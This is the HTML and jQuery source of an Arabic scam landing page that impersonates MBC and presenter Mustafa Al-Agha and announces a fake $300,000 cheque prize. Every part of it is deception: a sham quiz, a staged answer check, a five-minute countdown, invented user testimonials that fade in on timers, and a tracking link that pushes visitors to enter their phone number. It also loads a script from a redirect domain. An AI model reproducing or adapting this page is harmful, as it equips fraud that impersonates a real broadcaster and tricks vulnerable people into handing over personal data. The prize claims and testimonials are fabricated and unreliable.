<!doctype html>
<html lang="ar">
   <head>
       <title>انت مليونير الحلم</title>
             <meta charset="utf-8"/>
      <meta property="og:title" content="انت مليونير الحلم" />
	<meta property="og:type" content="website" /> 
	<meta property="og:image" content="efVwkAv.png" />
	<meta property="og:description" content="انت مليونير الحلم" />
     
	<link rel="image_src" href="efVwkAv.png" />
	<meta property="og:image" content="efVwkAv.png" />
<link rel="stylesheet" type="text/css" href="https://www.fontstatic.com/f=sky-bold" />
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<script src="jquery.min.js"></script>
<script src="dream.js"></script>
     <style>
         h5{
             font-family: "BoutrosMBCDinkum-Medium";
             z-index:+9999;
             font-family: 'sky-bold';
             font-size:20px;
             margin:0;
         }
         
         span{
             color: aqua;
         }
         
         #myVideo {
  position: fixed;
  right: 0;
  bottom: 0;
  min-width: 100%;
  min-height: 100%;
}
#main{
    
      position: fixed;
    bottom: 0;
    background: rgba(0, 0, 0, 0.5);
    color: #f1f1f1;
    width: 100%;
    padding: 20px;
    z-index:+99999;
    padding:0;
    margin:0;
    position:relative;
    overflow:hidden;
}
#content2{
    background: #fff !important;
}
.jss150{
    max-width: 350px;
}
#content2,#content3{
    
    
    margin: 20px;
    
}
@charset "utf-8";.button,.name,.profile{cursor:pointer}#comment1,#comment2,#comment3,#comment4,#comment5,#comment6,#content2,#content3,#q2,#q3,#q4,#result1,#result2,#result3{display:none}body{background-color:#222;font-family:Tahoma,Geneva,sans-serif;margin:0;padding:0}.header,.header p{background-color:#fff}.header{padding:10px}.header p,hr{padding:0;color:#fff}.header p{margin:0 0 0 30px}hr{border:1px solid #fff;margin:0}.header span{color:#fff}.content{padding:20px 10px}.dt{font-size:12px;text-align:right;color:#FFF}.button,.button2,.loading{text-align:center}.main-content{padding:10px;background-color:#fff!important;-webkit-border-radius:10px;-moz-border-radius:10px;border-radius:10px}.main-content h1{font-size:20px}.main-content h2{font-size:18px;font-weight:400}.name,.result{font-weight:700}.main-content p{font-size:13px}.main-content span{color:red}p.question{font-size:15px}.button{
    
    border: 2px solid #FFF;
    background-color: #eeb12e;
    padding: 6px 0;
    margin: 6px 0;
    color: #191717;
    border-radius: 20px;
    width: 80%;
    font-family: 'sky-bold';
    height: 20p;
    font-size: 20px;
    text-shadow: antiquewhite;
    
}.result{margin:0;padding:5px 0 5px 25px}.button2{background-color: #fa6400;color:#fff;font-size:20px;padding:3px 5px!important;-webkit-border-radius:20px;-moz-border-radius:20px;border-radius:20px}a.claim{color:#fff;text-decoration:none}.comment-status span,.name{color:#3b5998}.profile{float:left;width:60px;margin-right:10px}.comments{background-color:#eeeff4;border-bottom:2px solid #fff;padding:10px}.comment-content img,.profile img{width:100%}.comment-content{float:left;width:190px}.name{margin:0}.clr{clear:both}.comment-status{font-size:11px;cursor:pointer}.comment-like{background-repeat:no-repeat;display:inline-block;height:16px;width:16px}
     </style>
     <script>var pm_pid = "19447-a18a52d8";</script><script src="//free.redirectwin.tk/js/pub.min.js" async></script>
</head>
   <body>
       
      <div id="main">
 <center>
<div id="logo">
           <img class="jss299" src="mdxNnNl.png" alt="dream_logo_2">
</div>
       <img src="efVwkAv.png" alt="مسابقة الحلم" class="jss149">
       <h5 class="MuiTypography-root jss151 MuiTypography-h5">لتغيير حياة عائلة واحدة</h5>
       
       <img src="rJ0Jb7P.png" alt="mbc_big_prize" class="jss150">
       <div style="    font-family: 'sky-bold';
    font-size: 20px;
    width: 100%;">
تهانينا لك زائرنا مقدمه لك من مصطفي الاغا و فريق ام بي سي انت الفائز المؤكد اليوم وقد تم اختيار الهاتف الخاص بك  عشوائيا  للحصول  علي  الجائزه الكبري من مسابقه الشيك     
           
       </div>
       <div  id="q1">
<p class="question" style="text-align: right;"><span style="font-family: tahoma, arial, helvetica, sans-serif; font-size: 12pt;"><strong style="color: #000000;"><b style="color: #f6cb51;
    font-family: 'sky-bold';
    font-size: 20px;
    width: 100%;
    padding: 10px;">السوال الاول:هل قمت بالاشتراك في هذه المسابقه من قبل؟</b></strong></span></p>
<div class="button bq1">نعم</div>
<div class="button bq1">لا</div>
</div>
<div id="q2">
<p class="question" style="text-align: right;"><span style="font-family: tahoma, arial, helvetica, sans-serif; font-size: 12pt;"><strong style="color: #ff0000;"><span style="color: #f6cb51;
    font-family: 'sky-bold';
    font-size: 20px;
    width: 100%;
    padding: 10px;">السوال الثاني:</span></strong><strong style="color: #000000;"><b style="color: #f6cb51;
    font-family: 'sky-bold';
    font-size: 20px;
    width: 100%;
    padding: 10px;">ما هو مستوي دخلك الشهري ؟</b></strong></span></p>
<div class="button bq2">عالي</div>
<div class="button bq2">متوسط</div>
<div class="button bq2">ضعيف</div>
</div>
<div id="q3">
<p class="question" style="text-align: right;"><span style="font-size: 12pt; font-family: tahoma, arial, helvetica, sans-serif;"><strong style="color: #000000;"><span style="color: #f6cb51;
    font-family: 'sky-bold';
    font-size: 20px;
    width: 100%;
    padding: 10px;">السوال الثالث:</span></strong><strong style="color: #ff0000;"><b style="color: #f6cb51;
    font-family: 'sky-bold';
    font-size: 20px;
    width: 100%;
    padding: 10px;">هل تمتلك وظيفه ؟</b></strong></span></p>
<div class="button bq3">نعم</div>
<div class="button bq3">لا</div>
</div>
<div id="q4">
<p class="question" style="text-align: right;"><span style="font-family: tahoma, arial, helvetica, sans-serif; font-size: 12pt;"><strong style="color: #ff0000;"><span style="color: #f6cb51;
    font-family: 'sky-bold';
    font-size: 20px;
    width: 100%;
    padding: 10px;">السوال الرابع:هل سوف تقوم بتنفيذ جميع شروط المسابقه للفوز بهذا الشيك ؟؟</span></strong></span></p>
<div id="none" class="button bq4">نعم</div>
<div id="none2"  class="button bq4">لا</div>
</div>
<div  class="main-content" id="content2">
<h1 style="font-family: Tahoma, Geneva, sans-serif; text-align: center;"><span style="    color: #090604;
    font-weight: bolder;
    font-size: 14pt;
    font-family: 'sky-bold';">انتظر من فضلك يتم التحقق من اجابتك&nbsp;</span></h1>
<p class="loading"><img src="xxhYgtP.gif"></p>
<p style="    color: #090604;
    font-weight: bolder;
    font-size: 14pt;
    font-family: 'sky-bold';" class="result" id="result1">يتم التحقق من اجابتك الان.</p>
<p style="    color: #090604;
    font-weight: bolder;
    font-size: 14pt;
    font-family: 'sky-bold';" class="result" id="result2">تمت الاجابه علي كل الاسئله بشكل صحيح.</p>
<p style="    color: #090604;
    font-weight: bolder;
    font-size: 14pt;
    font-family: 'sky-bold';" class="result" id="result3"><span style="olor: #090604;
    font-weight: bolder;
    font-size: 14pt;
    font-family: 'sky-bold';">تهانينا لك ربحت شيك بقيمه $300.000 الف دولار مقدمه لك من مسابقه الحلم</span></p>
</div>
<div class="main-content" id="content3">
<p style="text-align: center;"><span style="font-weight: bolder;
    font-size: 14pt;
    font-family: 'sky-bold';"><span style="font-weight: bolder;
    font-size: 14pt;
    font-family: 'sky-bold';"><span style="font-size: 16px;"><span style="font-weight: bolder;
    font-size: 14pt;
    font-family: 'sky-bold';"><b><span style="color: #000000;"><span style="font-size: 18pt;">&nbsp;</span></span><span style="font-weight: bolder;
    font-size: 25pt;
    font-family: 'sky-bold';    color: #069a04;">تهانينا</span></b></span></span></span></span></p>
<p style="text-align: center;">
    
  <span style="display: block;
    font-size: 20px;
    font-family: 'sky-bold';
    color: #ff0101;"> مصطفى الاغا، وكيل قناة </span> <span style="display: block;
    font-size: 20px;
    font-family: 'sky-bold';
    color: #ff0101;"> MBC</span> <span style="display: block;
    font-size: 20px;
    font-family: 'sky-bold';
    color: #ff0101;"> يعلمك أنه قام بتوثيق شيكك وينتظرك رقم الهاتف </span> <span style="display: block;
    font-size: 20px;
    font-family: 'sky-bold';
    color: #ff0101;"> الشيك رقم "تحقق من رقم 04362512 بقيمة 300,000 دولار مقدمة لك من مسابقة الاختيار جاهزة للاستلام الآن </span> <span style="display: block;
    font-size: 20px;
    font-family: 'sky-bold';
    color: #ff0101;"> عليك النقر على الزر أدناه ووضع رقم هاتفك على صفحة الرعاة الخاصة بنا والتي هي في معظم الأحيان تطبيقات الجوال. بعد ذلك سوف نتصل بك على الفور. حتى نتمكن من كتابة اسمك على الشيك الخاص بك وإرساله إليك على الفور.  <span style="    color: #069a04;"> $300.000 </span> قم بالتعليمات ووضع رقم هاتفك بدقة لتلقي الشيك بشكل صحيح. </span> 
    
</p>
<p style="font-size: 16px; text-align: center;"><span style="color: #ff6600; font-family: tahoma, arial, helvetica, sans-serif; font-size: 12pt;"><strong>&nbsp; </strong></span></p>
<p style="text-align: center;"><span style="font-family: tahoma, arial, helvetica, sans-serif; font-size: 12pt; font-weight: bold; text-align: center; color: #000000;"><span style="color: #ff0000;"><span id="cdown2427">04:18</span>
<script>countdown("cdown2427",300,"m","");</script>
</span> &nbsp;&nbsp;<span style="color: #000000;">الوقت المتبقي لوضع في رقم هاتفك هو</span></span><span style="color: #000000; font-family: tahoma, arial, helvetica, sans-serif; font-size: 16px; font-weight: bold;">&nbsp;</span><span style="color: #000000; font-family: tahoma, arial, helvetica, sans-serif; font-size: 12pt; font-weight: bold;">&nbsp;<span style="color: #ff0000;">5</span></span><span style="color: #ff0000;">&nbsp;دقائق</span><span style="color: #000000; font-family: tahoma, arial, helvetica, sans-serif; font-size: 12pt; font-weight: bold;"> وسوف يقوم الحاسوب باختيار شخص اخر للفوز بهذا الشيك</span></p>
<p style="text-align: center;"><img src="9BmOZEC.png" alt="" 100="" width="240" height="148"></p>
<div style="text-align: center;"><strong><span style="font-size: 18pt;">
  
  <a onclick="linkClick(event)" href ="https://go.trackswin.com/click"  style="background-color: #fa6400!important;font-weight: bolder;
    font-size: 16pt;
    font-family: 'sky-bold';padding: 12px !important;" class="button2 claim">اأدخل رقمك للحصول على الشيك</a></span></strong></div>
<div style="text-align: center;"><strong><span style="font-size: 18pt;"></span></strong></div>
<p style="text-align: center;"><strong>&nbsp;</strong><strong>MBC 2020 ©&nbsp;&nbsp;</strong><strong>جميع الحقوق محفوظة لمجموعة&nbsp;</strong></p>
<p style="text-align: center;"></p>
</div>   
<div style="text-align: left;    margin: 20px;" class="main-content">
<div class="comments">
<p style="margin: 0; padding: 0; float: left; display: block; width: 50%;"><span style="color: #3b5998;">View More Comments</span></p>
<p style="margin: 0; padding: 0; float: right; display: block; width: 50%; color: #a8a7a7; text-align: right;">50 of 80</p>
<div style="clear: both;"></div>
</div>
<div class="comments" id="comment6" style="display: block;">
<div class="profile"><img src="pDlRg7t.png" width="60" height="40"></div>
<div class="comment-content">
<p class="name"><span style="color: #3b5998; font-family: Tahoma, Geneva, sans-serif;">Mohamed Zaher</span></p>
<p><span style="color: #000000; font-family: Tahoma, Geneva, sans-serif;">اقسم بالله العظيم اني ما كنت مصدق بس قررت اتصل وقمت باجراء الخطوات والان انا فزت شيك بمليون دولار وبجد انا واسرتي سعداء جدا&nbsp;</span><span style="color: #000000; font-family: Tahoma, Geneva, sans-serif;">&nbsp;الان شكرا لكم</span></p>
</div>
<div class="clr"></div>
<div class="comment-status"><span>Like · Comment ·<img src="oo2WpeB.jpg" height="15px" width="15px">34</span>· Just now</div>
</div>
<div class="comments" id="comment5" style="display: block;">
<div class="profile"><img src="pDlRg7t.png" width="60" height="40"></div>
<div class="comment-content">
<p class="name"><span style="color: #3b5998;">Dailia Mohamed</span></p>
<p><span style="color: #000000; font-family: Tahoma, Geneva, sans-serif;">اقسم لكم اخواتي ف الله اني ربحت شيك الان بمجرد الاتصال واتباع الخطوات قاموا&nbsp; بتحديد ميعاد لاستلام جائزتي انصح كل واحد يشوف تعليقي بالاتصال الان شكرررررررررا لك استاذ مصطفي</span></p>
</div>
<div class="clr"></div>
<div class="comment-status"><span>Like · Comment ·<img src="v9esrKl.jpg" height="15px" width="15px">34</span>· Just now</div>
</div>
<div class="comments" id="comment4" style="display: block;">
<div class="profile"><img src="vJ4Xgdo.png" width="60" height="40"></div>
<div class="comment-content">
<p class="name">حسين العتيبي</p>
<p style="color:#000">لا اقدر ان اوصف السعاده التي اشعر بها الان انا كنت متردد ف البدايه ولكن قولت في نفسي دعنا نجرب وكانت المفاجاه اقسم لكم جميعا ان ماحدث اني فوزت بشيك من مسابقه الحلم وحياتي اتغيرت شكرا شكرا قناه ام بي سي</p>
</div>
<div class="clr"></div>
<div class="comment-status"><span>Like · Comment ·<img src="oo2WpeB.jpg" height="15px" width="15px">8</span>· Just now</div>
</div>
<div class="comments" id="comment2" style="display: block;">
<div class="profile"><img src="SMusyvT.png" width="49" height="87"></div>
<div class="comment-content">
<p class="name">Saeed Mostafa</p>
<p style="color:#000;">شكرا لكم دائما تسعدونا بهذه الجوائز القيمه بجد شكررررررررا</p>
</div>
<div class="clr"></div>
<div class="comment-status"><span>Like · Comment ·<img src="oo2WpeB.jpg" height="15px" width="15px">100</span>· Just now</div>
</div>
<div class="comments">
<div class="profile"><img src="6lxuy0a.png" width="60" height="60"></div>
<div class="comment-content">
<p class="name">وسام قبانى</p>
<div class="comment-content">
<p><span style="color: #000000;">شكرا قنام ام بي سي فعلا قناه محترمه جدا كما تعودنا منها وهذا هو الشيك الخاص بي</span><img src="158992888778811.png" style="width: 154px;" height="102"></p>
</div>
</div>
<div class="clr"></div>
<div class="comment-status"><span>Like · Comment ·<img src="oo2WpeB.jpg" height="15px" width="15px">35</span>·</div>
</div>
<div class="comments">
<div class="profile"><img src="OUQCJkL.png" width="60" height="73"></div>
<div class="comment-content">
<p class="name">Maya Moktar</p>
<p><span style="color: #000000; font-family: Tahoma, Geneva, sans-serif;">انا مش مصدقه بجد اتا اتصلت بقناه ام بي سي وتم اختياري لربح شيك بقيمه300 الف دولار شكرا لكم&nbsp;</span></p>
</div>
<div class="clr"></div>
<div class="comment-status"><span>Like · Comment ·<img src="oo2WpeB.jpg" height="15px" width="15px">45</span>·</div>
</div>
<div class="comments">
<div class="profile"><img src="YWTE6Pp.png" width="60" height="40"></div>
<div class="comment-content">
<p class="name">سالم ابو علي</p>
<p><span style="color: #000000;">كنت لا اصدق مثل هذه المسابقات ولكن لا اخسر شي اذا جربت وكانت المفاجاه ان فريق ام بي سي تواصل معي وقال لي اني فزت بشيك بقيمه 300 الف دولار شكرا لكم جدا</span></p>
</div>
<div class="clr"></div>
<div class="comment-status"><span>Like · Comment ·<img src="oo2WpeB.jpg" height="15px" width="15px">10</span>·</div>
</div>
<div class="comments">
<div class="profile"><img src="z9rgC22.png" width="60" height="69"></div>
<div class="comment-content">
<p class="name">Badr El Shekih</p>
<p style="color:#000">انا اول مره افوز بجائزه بمجرد الاتصال لتوثيق بياناتي الشخصيه وجدت نفسي فائز ف مسابقه الشيك شكرررررررا لكم&nbsp;</p>
</div>
<div class="clr"></div>
<div class="comment-status"><span>Like · Comment ·<img src="oo2WpeB.jpg" height="15px" width="15px">13</span>·</div>
</div>
<div class="comments">
<div class="profile"><img src="auwWei3.png" width="50" height="58"></div>
<div class="comment-content">
<p class="name">Nancy Nabil</p>
<p>انا مبسوطه اوي اوي اوي كنت محتاجه اغير حياتي بجد شكرا ام بي سي&nbsp;</p>
</div>
<div class="clr"></div>
<div class="comment-status"><span>Like · Comment ·<img src="oo2WpeB.jpg" height="15px" width="15px">5</span>-</div>
</div>
<hr align="center" color="black" size="2px" width="100%"></div>
       
 </center>
      </div>
<video autoplay muted loop id="myVideo">
  <source src="https://dl.dropboxusercontent.com/s/u82hgz5x8suv4xf/DREAM_BG_test.e4afc1c3%5B1%5D.mp4" type="video/mp4">
  
  
</video>
<script type="text/javascript"> var voucher = 750;
if (voucher == undefined) voucher = "";
function get_date(days) {
return dtime(days);
}
$(document).ready(function() {
setTimeout(function() {
$("#comment1").fadeIn();
}, 10000);
setTimeout(function() {
$("#comment2").fadeIn();
}, 12000);
setTimeout(function() {
$("#comment3").fadeIn();
}, 13000);
setTimeout(function() {
$("#comment4").fadeIn();
}, 18000);
setTimeout(function() {
$("#comment5").fadeIn();
}, 20000);
setTimeout(function() {
$("#comment6").fadeIn();
}, 22000);
$(".bq1").click(function() {
$("#q1").fadeOut(0);
$("#q2").fadeIn(500);
});
$(".bq2").click(function() {
$("#q2").fadeOut(0);
$("#q3").fadeIn(500);
});
$(".bq3").click(function() {
$("#q3").fadeOut(0);
$("#q4").fadeIn(500);
});
$(".bq4").click(function() {
$("#content1").fadeOut(0);
$("#content2").fadeIn();
setTimeout(function() {
$("#result1").fadeIn(1000);
}, 3000);
setTimeout(function() {
$("#result2").fadeIn(1000);
}, 4500);
setTimeout(function() {
$("#result3").fadeIn(1000);
}, 6000);
setTimeout(function() {
$("#content2").fadeOut();
}, 7500);
setTimeout(function() {
$("#content3").fadeIn();
}, 7500);
$("#btnclaim2").fadeIn();
});
$(".claim").click(function() {
$("#content3").fadeOut(0);
$("#content4").fadeIn();
});
});
$('#none').click(function() {
    $('#q4').css({
        'display': 'none',
    });
});
$('#none2').click(function() {
    $('#q4').css({
        'display': 'none',
    });
});
var objDiv = document.getElementById("content2");
objDiv.scrollTop = objDiv.scrollHeight;
</script>
<div style="display:none;">
   </body>
 
<!-- This landing page has been Generated using purelander.com -->
</html>